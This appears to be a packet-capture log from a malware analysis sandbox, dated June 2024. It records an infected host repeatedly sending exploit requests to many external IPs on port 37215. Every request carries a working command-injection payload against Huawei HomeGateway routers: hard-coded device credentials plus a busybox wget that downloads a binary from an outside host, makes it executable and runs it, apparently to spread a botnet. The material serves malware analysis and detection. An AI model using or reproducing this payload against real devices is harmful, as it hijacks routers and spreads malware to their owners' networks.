                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2392192.168.2.155194637.123.142.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473779917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2393192.168.2.1560162157.98.250.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473794937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2394192.168.2.1557878157.66.92.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473810911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2395192.168.2.153418094.10.120.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474520922 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2396192.168.2.1551248181.236.86.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474540949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2397192.168.2.155720294.145.49.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474567890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2398192.168.2.1542460156.208.21.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474617958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2399192.168.2.1551708122.130.133.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474683046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2400192.168.2.1534400157.203.19.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474700928 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2401192.168.2.1549816186.78.32.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474725008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2402192.168.2.155573231.14.185.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474742889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
